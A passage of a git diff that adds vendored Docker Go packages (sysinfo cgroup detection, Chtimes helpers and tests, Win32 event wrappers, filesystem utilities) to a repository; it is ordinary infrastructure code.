+func checkCgroupBlkioInfo(cgMounts map[string]string, quiet bool) cgroupBlkioInfo {
+	mountPoint, ok := cgMounts["blkio"]
+	if !ok {
+		if !quiet {
+			logrus.Warn("Unable to find blkio cgroup in mounts")
+		}
+		return cgroupBlkioInfo{}
+	}
+
+	weight := cgroupEnabled(mountPoint, "blkio.weight")
+	if !quiet && !weight {
+		logrus.Warn("Your kernel does not support cgroup blkio weight")
+	}
+
+	weightDevice := cgroupEnabled(mountPoint, "blkio.weight_device")
+	if !quiet && !weightDevice {
+		logrus.Warn("Your kernel does not support cgroup blkio weight_device")
+	}
+
+	readBpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.read_bps_device")
+	if !quiet && !readBpsDevice {
+		logrus.Warn("Your kernel does not support cgroup blkio throttle.read_bps_device")
+	}
+
+	writeBpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.write_bps_device")
+	if !quiet && !writeBpsDevice {
+		logrus.Warn("Your kernel does not support cgroup blkio throttle.write_bps_device")
+	}
+	readIOpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.read_iops_device")
+	if !quiet && !readIOpsDevice {
+		logrus.Warn("Your kernel does not support cgroup blkio throttle.read_iops_device")
+	}
+
+	writeIOpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.write_iops_device")
+	if !quiet && !writeIOpsDevice {
+		logrus.Warn("Your kernel does not support cgroup blkio throttle.write_iops_device")
+	}
+	return cgroupBlkioInfo{
+		BlkioWeight:          weight,
+		BlkioWeightDevice:    weightDevice,
+		BlkioReadBpsDevice:   readBpsDevice,
+		BlkioWriteBpsDevice:  writeBpsDevice,
+		BlkioReadIOpsDevice:  readIOpsDevice,
+		BlkioWriteIOpsDevice: writeIOpsDevice,
+	}
+}
+
+// checkCgroupCpusetInfo reads the cpuset information from the cpuset cgroup mount point.
+func checkCgroupCpusetInfo(cgMounts map[string]string, quiet bool) cgroupCpusetInfo {
+	mountPoint, ok := cgMounts["cpuset"]
+	if !ok {
+		if !quiet {
+			logrus.Warn("Unable to find cpuset cgroup in mounts")
+		}
+		return cgroupCpusetInfo{}
+	}
+
+	cpus, err := ioutil.ReadFile(path.Join(mountPoint, "cpuset.cpus"))
+	if err != nil {
+		return cgroupCpusetInfo{}
+	}
+
+	mems, err := ioutil.ReadFile(path.Join(mountPoint, "cpuset.mems"))
+	if err != nil {
+		return cgroupCpusetInfo{}
+	}
+
+	return cgroupCpusetInfo{
+		Cpuset: true,
+		Cpus:   strings.TrimSpace(string(cpus)),
+		Mems:   strings.TrimSpace(string(mems)),
+	}
+}
+
+// checkCgroupPids reads the pids information from the pids cgroup mount point.
+func checkCgroupPids(quiet bool) cgroupPids {
+	_, err := cgroups.FindCgroupMountpoint("pids")
+	if err != nil {
+		if !quiet {
+			logrus.Warn(err)
+		}
+		return cgroupPids{}
+	}
+
+	return cgroupPids{
+		PidsLimit: true,
+	}
+}
+
+func cgroupEnabled(mountPoint, name string) bool {
+	_, err := os.Stat(path.Join(mountPoint, name))
+	return err == nil
+}
+
+func readProcBool(path string) bool {
+	val, err := ioutil.ReadFile(path)
+	if err != nil {
+		return false
+	}
+	return strings.TrimSpace(string(val)) == "1"
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go
new file mode 100644
index 0000000000..fae0fdffbb
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go
@@ -0,0 +1,58 @@
+package sysinfo
+
+import (
+	"io/ioutil"
+	"os"
+	"path"
+	"path/filepath"
+	"testing"
+)
+
+func TestReadProcBool(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "test-sysinfo-proc")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	procFile := filepath.Join(tmpDir, "read-proc-bool")
+	if err := ioutil.WriteFile(procFile, []byte("1"), 644); err != nil {
+		t.Fatal(err)
+	}
+
+	if !readProcBool(procFile) {
+		t.Fatal("expected proc bool to be true, got false")
+	}
+
+	if err := ioutil.WriteFile(procFile, []byte("0"), 644); err != nil {
+		t.Fatal(err)
+	}
+	if readProcBool(procFile) {
+		t.Fatal("expected proc bool to be false, got false")
+	}
+
+	if readProcBool(path.Join(tmpDir, "no-exist")) {
+		t.Fatal("should be false for non-existent entry")
+	}
+
+}
+
+func TestCgroupEnabled(t *testing.T) {
+	cgroupDir, err := ioutil.TempDir("", "cgroup-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(cgroupDir)
+
+	if cgroupEnabled(cgroupDir, "test") {
+		t.Fatal("cgroupEnabled should be false")
+	}
+
+	if err := ioutil.WriteFile(path.Join(cgroupDir, "test"), []byte{}, 644); err != nil {
+		t.Fatal(err)
+	}
+
+	if !cgroupEnabled(cgroupDir, "test") {
+		t.Fatal("cgroupEnabled should be true")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go
new file mode 100644
index 0000000000..c858d57e08
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go
@@ -0,0 +1,121 @@
+// +build solaris,cgo
+
+package sysinfo
+
+import (
+	"bytes"
+	"os/exec"
+	"strconv"
+	"strings"
+)
+
+/*
+#cgo LDFLAGS: -llgrp
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/lgrp_user.h>
+int getLgrpCount() {
+	lgrp_cookie_t lgrpcookie = LGRP_COOKIE_NONE;
+	uint_t nlgrps;
+
+	if ((lgrpcookie = lgrp_init(LGRP_VIEW_OS)) == LGRP_COOKIE_NONE) {
+		return -1;
+	}
+	nlgrps = lgrp_nlgrps(lgrpcookie);
+	return nlgrps;
+}
+*/
+import "C"
+
+// IsCPUSharesAvailable returns whether CPUShares setting is supported.
+// We need FSS to be set as default scheduling class to support CPU Shares
+func IsCPUSharesAvailable() bool {
+	cmd := exec.Command("/usr/sbin/dispadmin", "-d")
+	outBuf := new(bytes.Buffer)
+	errBuf := new(bytes.Buffer)
+	cmd.Stderr = errBuf
+	cmd.Stdout = outBuf
+
+	if err := cmd.Run(); err != nil {
+		return false
+	}
+	return (strings.Contains(outBuf.String(), "FSS"))
+}
+
+// New returns a new SysInfo, using the filesystem to detect which features
+// the kernel supports.
+//NOTE Solaris: If we change the below capabilities be sure
+// to update verifyPlatformContainerSettings() in daemon_solaris.go
+func New(quiet bool) *SysInfo {
+	sysInfo := &SysInfo{}
+	sysInfo.cgroupMemInfo = setCgroupMem(quiet)
+	sysInfo.cgroupCPUInfo = setCgroupCPU(quiet)
+	sysInfo.cgroupBlkioInfo = setCgroupBlkioInfo(quiet)
+	sysInfo.cgroupCpusetInfo = setCgroupCPUsetInfo(quiet)
+
+	sysInfo.IPv4ForwardingDisabled = false
+
+	sysInfo.AppArmor = false
+
+	return sysInfo
+}
+
+// setCgroupMem reads the memory information for Solaris.
+func setCgroupMem(quiet bool) cgroupMemInfo {
+
+	return cgroupMemInfo{
+		MemoryLimit:       true,
+		SwapLimit:         true,
+		MemoryReservation: false,
+		OomKillDisable:    false,
+		MemorySwappiness:  false,
+		KernelMemory:      false,
+	}
+}
+
+// setCgroupCPU reads the cpu information for Solaris.
+func setCgroupCPU(quiet bool) cgroupCPUInfo {
+
+	return cgroupCPUInfo{
+		CPUShares:          true,
+		CPUCfsPeriod:       false,
+		CPUCfsQuota:        true,
+		CPURealtimePeriod:  false,
+		CPURealtimeRuntime: false,
+	}
+}
+
+// blkio switches are not supported in Solaris.
+func setCgroupBlkioInfo(quiet bool) cgroupBlkioInfo {
+
+	return cgroupBlkioInfo{
+		BlkioWeight:       false,
+		BlkioWeightDevice: false,
+	}
+}
+
+// setCgroupCPUsetInfo reads the cpuset information for Solaris.
+func setCgroupCPUsetInfo(quiet bool) cgroupCpusetInfo {
+
+	return cgroupCpusetInfo{
+		Cpuset: true,
+		Cpus:   getCPUCount(),
+		Mems:   getLgrpCount(),
+	}
+}
+
+func getCPUCount() string {
+	ncpus := C.sysconf(C._SC_NPROCESSORS_ONLN)
+	if ncpus <= 0 {
+		return ""
+	}
+	return strconv.FormatInt(int64(ncpus), 16)
+}
+
+func getLgrpCount() string {
+	nlgrps := C.getLgrpCount()
+	if nlgrps <= 0 {
+		return ""
+	}
+	return strconv.FormatInt(int64(nlgrps), 16)
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go
new file mode 100644
index 0000000000..b61fbcf541
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go
@@ -0,0 +1,26 @@
+package sysinfo
+
+import "testing"
+
+func TestIsCpusetListAvailable(t *testing.T) {
+	cases := []struct {
+		provided  string
+		available string
+		res       bool
+		err       bool
+	}{
+		{"1", "0-4", true, false},
+		{"01,3", "0-4", true, false},
+		{"", "0-7", true, false},
+		{"1--42", "0-7", false, true},
+		{"1-42", "00-1,8,,9", false, true},
+		{"1,41-42", "43,45", false, false},
+		{"0-3", "", false, false},
+	}
+	for _, c := range cases {
+		r, err := isCpusetListAvailable(c.provided, c.available)
+		if (c.err && err == nil) && r != c.res {
+			t.Fatalf("Expected pair: %v, %v for %s, %s. Got %v, %v instead", c.res, c.err, c.provided, c.available, (c.err && err == nil), r)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go
new file mode 100644
index 0000000000..45f3ef1c65
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go
@@ -0,0 +1,9 @@
+// +build !linux,!solaris,!windows
+
+package sysinfo
+
+// New returns an empty SysInfo for non linux nor solaris for now.
+func New(quiet bool) *SysInfo {
+	sysInfo := &SysInfo{}
+	return sysInfo
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go
new file mode 100644
index 0000000000..4e6255bc59
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go
@@ -0,0 +1,9 @@
+// +build windows
+
+package sysinfo
+
+// New returns an empty SysInfo for windows for now.
+func New(quiet bool) *SysInfo {
+	sysInfo := &SysInfo{}
+	return sysInfo
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes.go b/vendor/github.com/docker/docker/pkg/system/chtimes.go
new file mode 100644
index 0000000000..7637f12e1a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes.go
@@ -0,0 +1,52 @@
+package system
+
+import (
+	"os"
+	"syscall"
+	"time"
+	"unsafe"
+)
+
+var (
+	maxTime time.Time
+)
+
+func init() {
+	if unsafe.Sizeof(syscall.Timespec{}.Nsec) == 8 {
+		// This is a 64 bit timespec
+		// os.Chtimes limits time to the following
+		maxTime = time.Unix(0, 1<<63-1)
+	} else {
+		// This is a 32 bit timespec
+		maxTime = time.Unix(1<<31-1, 0)
+	}
+}
+
+// Chtimes changes the access time and modified time of a file at the given path
+func Chtimes(name string, atime time.Time, mtime time.Time) error {
+	unixMinTime := time.Unix(0, 0)
+	unixMaxTime := maxTime
+
+	// If the modified time is prior to the Unix Epoch, or after the
+	// end of Unix Time, os.Chtimes has undefined behavior
+	// default to Unix Epoch in this case, just in case
+
+	if atime.Before(unixMinTime) || atime.After(unixMaxTime) {
+		atime = unixMinTime
+	}
+
+	if mtime.Before(unixMinTime) || mtime.After(unixMaxTime) {
+		mtime = unixMinTime
+	}
+
+	if err := os.Chtimes(name, atime, mtime); err != nil {
+		return err
+	}
+
+	// Take platform specific action for setting create time.
+	if err := setCTime(name, mtime); err != nil {
+		return err
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go
new file mode 100644
index 0000000000..5c87df32a2
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go
@@ -0,0 +1,94 @@
+package system
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+	"time"
+)
+
+// prepareTempFile creates a temporary file in a temporary directory.
+func prepareTempFile(t *testing.T) (string, string) {
+	dir, err := ioutil.TempDir("", "docker-system-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	file := filepath.Join(dir, "exist")
+	if err := ioutil.WriteFile(file, []byte("hello"), 0644); err != nil {
+		t.Fatal(err)
+	}
+	return file, dir
+}
+
+// TestChtimes tests Chtimes on a tempfile. Test only mTime, because aTime is OS dependent
+func TestChtimes(t *testing.T) {
+	file, dir := prepareTempFile(t)
+	defer os.RemoveAll(dir)
+
+	beforeUnixEpochTime := time.Unix(0, 0).Add(-100 * time.Second)
+	unixEpochTime := time.Unix(0, 0)
+	afterUnixEpochTime := time.Unix(100, 0)
+	unixMaxTime := maxTime
+
+	// Test both aTime and mTime set to Unix Epoch
+	Chtimes(file, unixEpochTime, unixEpochTime)
+
+	f, err := os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if f.ModTime() != unixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", unixEpochTime, f.ModTime())
+	}
+
+	// Test aTime before Unix Epoch and mTime set to Unix Epoch
+	Chtimes(file, beforeUnixEpochTime, unixEpochTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if f.ModTime() != unixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", unixEpochTime, f.ModTime())
+	}
+
+	// Test aTime set to Unix Epoch and mTime before Unix Epoch
+	Chtimes(file, unixEpochTime, beforeUnixEpochTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if f.ModTime() != unixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", unixEpochTime, f.ModTime())
+	}
+
+	// Test both aTime and mTime set to after Unix Epoch (valid time)
+	Chtimes(file, afterUnixEpochTime, afterUnixEpochTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if f.ModTime() != afterUnixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", afterUnixEpochTime, f.ModTime())
+	}
+
+	// Test both aTime and mTime set to Unix max time
+	Chtimes(file, unixMaxTime, unixMaxTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if f.ModTime().Truncate(time.Second) != unixMaxTime.Truncate(time.Second) {
+		t.Fatalf("Expected: %s, got: %s", unixMaxTime.Truncate(time.Second), f.ModTime().Truncate(time.Second))
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go
new file mode 100644
index 0000000000..09d58bcbfd
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go
@@ -0,0 +1,14 @@
+// +build !windows
+
+package system
+
+import (
+	"time"
+)
+
+//setCTime will set the create time on a file. On Unix, the create
+//time is updated as a side effect of setting the modified time, so
+//no action is required.
+func setCTime(path string, ctime time.Time) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go
new file mode 100644
index 0000000000..6ec9a7173c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go
@@ -0,0 +1,91 @@
+// +build !windows
+
+package system
+
+import (
+	"os"
+	"syscall"
+	"testing"
+	"time"
+)
+
+// TestChtimesLinux tests Chtimes access time on a tempfile on Linux
+func TestChtimesLinux(t *testing.T) {
+	file, dir := prepareTempFile(t)
+	defer os.RemoveAll(dir)
+
+	beforeUnixEpochTime := time.Unix(0, 0).Add(-100 * time.Second)
+	unixEpochTime := time.Unix(0, 0)
+	afterUnixEpochTime := time.Unix(100, 0)
+	unixMaxTime := maxTime
+
+	// Test both aTime and mTime set to Unix Epoch
+	Chtimes(file, unixEpochTime, unixEpochTime)
+
+	f, err := os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	stat := f.Sys().(*syscall.Stat_t)
+	aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec))
+	if aTime != unixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime)
+	}
+
+	// Test aTime before Unix Epoch and mTime set to Unix Epoch
+	Chtimes(file, beforeUnixEpochTime, unixEpochTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	stat = f.Sys().(*syscall.Stat_t)
+	aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec))
+	if aTime != unixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime)
+	}
+
+	// Test aTime set to Unix Epoch and mTime before Unix Epoch
+	Chtimes(file, unixEpochTime, beforeUnixEpochTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	stat = f.Sys().(*syscall.Stat_t)
+	aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec))
+	if aTime != unixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime)
+	}
+
+	// Test both aTime and mTime set to after Unix Epoch (valid time)
+	Chtimes(file, afterUnixEpochTime, afterUnixEpochTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	stat = f.Sys().(*syscall.Stat_t)
+	aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec))
+	if aTime != afterUnixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", afterUnixEpochTime, aTime)
+	}
+
+	// Test both aTime and mTime set to Unix max time
+	Chtimes(file, unixMaxTime, unixMaxTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	stat = f.Sys().(*syscall.Stat_t)
+	aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec))
+	if aTime.Truncate(time.Second) != unixMaxTime.Truncate(time.Second) {
+		t.Fatalf("Expected: %s, got: %s", unixMaxTime.Truncate(time.Second), aTime.Truncate(time.Second))
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go
new file mode 100644
index 0000000000..2945868465
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go
@@ -0,0 +1,27 @@
+// +build windows
+
+package system
+
+import (
+	"syscall"
+	"time"
+)
+
+//setCTime will set the create time on a file. On Windows, this requires
+//calling SetFileTime and explicitly including the create time.
+func setCTime(path string, ctime time.Time) error {
+	ctimespec := syscall.NsecToTimespec(ctime.UnixNano())
+	pathp, e := syscall.UTF16PtrFromString(path)
+	if e != nil {
+		return e
+	}
+	h, e := syscall.CreateFile(pathp,
+		syscall.FILE_WRITE_ATTRIBUTES, syscall.FILE_SHARE_WRITE, nil,
+		syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0)
+	if e != nil {
+		return e
+	}
+	defer syscall.Close(h)
+	c := syscall.NsecToFiletime(syscall.TimespecToNsec(ctimespec))
+	return syscall.SetFileTime(h, &c, nil, nil)
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go
new file mode 100644
index 0000000000..72d8a10619
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go
@@ -0,0 +1,86 @@
+// +build windows
+
+package system
+
+import (
+	"os"
+	"syscall"
+	"testing"
+	"time"
+)
+
+// TestChtimesWindows tests Chtimes access time on a tempfile on Windows
+func TestChtimesWindows(t *testing.T) {
+	file, dir := prepareTempFile(t)
+	defer os.RemoveAll(dir)
+
+	beforeUnixEpochTime := time.Unix(0, 0).Add(-100 * time.Second)
+	unixEpochTime := time.Unix(0, 0)
+	afterUnixEpochTime := time.Unix(100, 0)
+	unixMaxTime := maxTime
+
+	// Test both aTime and mTime set to Unix Epoch
+	Chtimes(file, unixEpochTime, unixEpochTime)
+
+	f, err := os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	aTime := time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds())
+	if aTime != unixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime)
+	}
+
+	// Test aTime before Unix Epoch and mTime set to Unix Epoch
+	Chtimes(file, beforeUnixEpochTime, unixEpochTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds())
+	if aTime != unixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime)
+	}
+
+	// Test aTime set to Unix Epoch and mTime before Unix Epoch
+	Chtimes(file, unixEpochTime, beforeUnixEpochTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds())
+	if aTime != unixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime)
+	}
+
+	// Test both aTime and mTime set to after Unix Epoch (valid time)
+	Chtimes(file, afterUnixEpochTime, afterUnixEpochTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds())
+	if aTime != afterUnixEpochTime {
+		t.Fatalf("Expected: %s, got: %s", afterUnixEpochTime, aTime)
+	}
+
+	// Test both aTime and mTime set to Unix max time
+	Chtimes(file, unixMaxTime, unixMaxTime)
+
+	f, err = os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds())
+	if aTime.Truncate(time.Second) != unixMaxTime.Truncate(time.Second) {
+		t.Fatalf("Expected: %s, got: %s", unixMaxTime.Truncate(time.Second), aTime.Truncate(time.Second))
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/errors.go b/vendor/github.com/docker/docker/pkg/system/errors.go
new file mode 100644
index 0000000000..288318985e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/errors.go
@@ -0,0 +1,10 @@
+package system
+
+import (
+	"errors"
+)
+
+var (
+	// ErrNotSupportedPlatform means the platform is not supported.
+	ErrNotSupportedPlatform = errors.New("platform and architecture is not supported")
+)
diff --git a/vendor/github.com/docker/docker/pkg/system/events_windows.go b/vendor/github.com/docker/docker/pkg/system/events_windows.go
new file mode 100644
index 0000000000..3ec6d22151
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/events_windows.go
@@ -0,0 +1,85 @@
+package system
+
+// This file implements syscalls for Win32 events which are not implemented
+// in golang.
+
+import (
+	"syscall"
+	"unsafe"
+
+	"golang.org/x/sys/windows"
+)
+
+var (
+	procCreateEvent = modkernel32.NewProc("CreateEventW")
+	procOpenEvent   = modkernel32.NewProc("OpenEventW")
+	procSetEvent    = modkernel32.NewProc("SetEvent")
+	procResetEvent  = modkernel32.NewProc("ResetEvent")
+	procPulseEvent  = modkernel32.NewProc("PulseEvent")
+)
+
+// CreateEvent implements win32 CreateEventW func in golang. It will create an event object.
+func CreateEvent(eventAttributes *syscall.SecurityAttributes, manualReset bool, initialState bool, name string) (handle syscall.Handle, err error) {
+	namep, _ := syscall.UTF16PtrFromString(name)
+	var _p1 uint32
+	if manualReset {
+		_p1 = 1
+	}
+	var _p2 uint32
+	if initialState {
+		_p2 = 1
+	}
+	r0, _, e1 := procCreateEvent.Call(uintptr(unsafe.Pointer(eventAttributes)), uintptr(_p1), uintptr(_p2), uintptr(unsafe.Pointer(namep)))
+	use(unsafe.Pointer(namep))
+	handle = syscall.Handle(r0)
+	if handle == syscall.InvalidHandle {
+		err = e1
+	}
+	return
+}
+
+// OpenEvent implements win32 OpenEventW func in golang. It opens an event object.
+func OpenEvent(desiredAccess uint32, inheritHandle bool, name string) (handle syscall.Handle, err error) {
+	namep, _ := syscall.UTF16PtrFromString(name)
+	var _p1 uint32
+	if inheritHandle {
+		_p1 = 1
+	}
+	r0, _, e1 := procOpenEvent.Call(uintptr(desiredAccess), uintptr(_p1), uintptr(unsafe.Pointer(namep)))
+	use(unsafe.Pointer(namep))
+	handle = syscall.Handle(r0)
+	if handle == syscall.InvalidHandle {
+		err = e1
+	}
+	return
+}
+
+// SetEvent implements win32 SetEvent func in golang.
+func SetEvent(handle syscall.Handle) (err error) {
+	return setResetPulse(handle, procSetEvent)
+}
+
+// ResetEvent implements win32 ResetEvent func in golang.
+func ResetEvent(handle syscall.Handle) (err error) {
+	return setResetPulse(handle, procResetEvent)
+}
+
+// PulseEvent implements win32 PulseEvent func in golang.
+func PulseEvent(handle syscall.Handle) (err error) {
+	return setResetPulse(handle, procPulseEvent)
+}
+
+func setResetPulse(handle syscall.Handle, proc *windows.LazyProc) (err error) {
+	r0, _, _ := proc.Call(uintptr(handle))
+	if r0 != 0 {
+		err = syscall.Errno(r0)
+	}
+	return
+}
+
+var temp unsafe.Pointer
+
+// use ensures a variable is kept alive without the GC freeing while still needed
+func use(p unsafe.Pointer) {
+	temp = p
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/exitcode.go b/vendor/github.com/docker/docker/pkg/system/exitcode.go
new file mode 100644
index 0000000000..60f0514b1d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/exitcode.go
@@ -0,0 +1,33 @@
+package system
+
+import (
+	"fmt"
+	"os/exec"
+	"syscall"
+)
+
+// GetExitCode returns the ExitStatus of the specified error if its type is
+// exec.ExitError, returns 0 and an error otherwise.
+func GetExitCode(err error) (int, error) {
+	exitCode := 0
+	if exiterr, ok := err.(*exec.ExitError); ok {
+		if procExit, ok := exiterr.Sys().(syscall.WaitStatus); ok {
+			return procExit.ExitStatus(), nil
+		}
+	}
+	return exitCode, fmt.Errorf("failed to get exit code")
+}
+
+// ProcessExitCode process the specified error and returns the exit status code
+// if the error was of type exec.ExitError, returns nothing otherwise.
+func ProcessExitCode(err error) (exitCode int) {
+	if err != nil {
+		var exiterr error
+		if exitCode, exiterr = GetExitCode(err); exiterr != nil {
+			// TODO: Fix this so we check the error's text.
+			// we've failed to retrieve exit code, so we set it to 127
+			exitCode = 127
+		}
+	}
+	return
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/filesys.go b/vendor/github.com/docker/docker/pkg/system/filesys.go
new file mode 100644
index 0000000000..810c794786
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/filesys.go
@@ -0,0 +1,54 @@
+// +build !windows
+
+package system
+
+import (
+	"os"
+	"path/filepath"
+)
+
+// MkdirAllWithACL is a wrapper for MkdirAll that creates a directory
+// ACL'd for Builtin Administrators and Local System.
+func MkdirAllWithACL(path string, perm os.FileMode) error {
+	return MkdirAll(path, perm)
+}
+
+// MkdirAll creates a directory named path along with any necessary parents,
+// with permission specified by attribute perm for all dir created.
+func MkdirAll(path string, perm os.FileMode) error {
+	return os.MkdirAll(path, perm)
+}
+
+// IsAbs is a platform-specific wrapper for filepath.IsAbs.
+func IsAbs(path string) bool {
+	return filepath.IsAbs(path)
+}
+
+// The functions below here are wrappers for the equivalents in the os package.
+// They are passthrough on Unix platforms, and only relevant on Windows.
+
+// CreateSequential creates the named file with mode 0666 (before umask), truncating
+// it if it already exists. If successful, methods on the returned
+// File can be used for I/O; the associated file descriptor has mode
+// O_RDWR.
+// If there is an error, it will be of type *PathError.
+func CreateSequential(name string) (*os.File, error) {
+	return os.Create(name)
+}
+
+// OpenSequential opens the named file for reading. If successful, methods on
+// the returned file can be used for reading; the associated file
+// descriptor has mode O_RDONLY.
+// If there is an error, it will be of type *PathError.
+func OpenSequential(name string) (*os.File, error) {
+	return os.Open(name)
+}
+
+// OpenFileSequential is the generalized open call; most users will use Open
+// or Create instead. It opens the named file with specified flag
+// (O_RDONLY etc.) and perm, (0666 etc.) if applicable. If successful,
+// methods on the returned File can be used for I/O.
+// If there is an error, it will be of type *PathError.
+func OpenFileSequential(name string, flag int, perm os.FileMode) (*os.File, error) {
+	return os.OpenFile(name, flag, perm)
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/filesys_windows.go b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go
new file mode 100644
index 0000000000..6094f01fd4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go
@@ -0,0 +1,236 @@
+// +build windows
+
+package system
+
+import (
+	"os"
+	"path/filepath"
+	"regexp"
+	"strings"
+	"syscall"
+	"unsafe"
+
+	winio "github.com/Microsoft/go-winio"
+)
+
+// MkdirAllWithACL is a wrapper for MkdirAll that creates a directory
+// ACL'd for Builtin Administrators and Local System.
+func MkdirAllWithACL(path string, perm os.FileMode) error {
+	return mkdirall(path, true)
+}
+
+// MkdirAll implementation that is volume path aware for Windows.
+func MkdirAll(path string, _ os.FileMode) error {
+	return mkdirall(path, false)
+}
+
+// mkdirall is a custom version of os.MkdirAll modified for use on Windows
+// so that it is both volume path aware, and can create a directory with
+// a DACL.
+func mkdirall(path string, adminAndLocalSystem bool) error {
